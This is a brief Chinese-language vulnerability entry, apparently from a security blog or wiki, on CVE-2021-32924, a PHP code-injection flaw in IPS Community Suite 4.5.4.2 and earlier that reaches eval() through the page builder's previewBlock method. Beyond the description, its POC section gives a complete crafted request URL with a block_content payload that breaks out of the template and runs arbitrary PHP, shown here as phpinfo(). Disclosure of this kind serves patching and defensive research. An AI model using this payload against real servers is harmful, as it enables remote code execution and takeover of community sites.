CVE-2021-32924_IPS_Community_Suite_4.5.4.2_PHP代碼注入漏洞

# CVE-2021-32924 IPS Community Suite 4.5.4.2 PHP代碼注入漏洞/zh-cn

==简介==
IPS Community Suite versions 4.5.4.2及以下版本存在 PHP 代码注入漏洞。该漏洞的存在是因为IPS\cms\modules\front\pages\_builder::previewBlock()方法允许将任意内容传递给IPS\_Theme::runProcessFunction()方法，该方法将用于调用eval()PHP函数。这可以被利用来注入和执行任意 PHP 代码。成功利用此漏洞需要具有管理侧边栏权限的帐户（例如版主或管理员）并启用“cms”应用程序。

==POC==

http://[host]/[ips]/index.php?app=cms&module=pages&controller=builder&do=previewBlock&block_plugin=stats&block_template_use_how=copy&block_plugin_app=core&_sending=block_content&block_content=RCE%0ACONTENT;}}phpinfo();die;/*

文章版权归作者所有，未经允许请勿转载。

THE END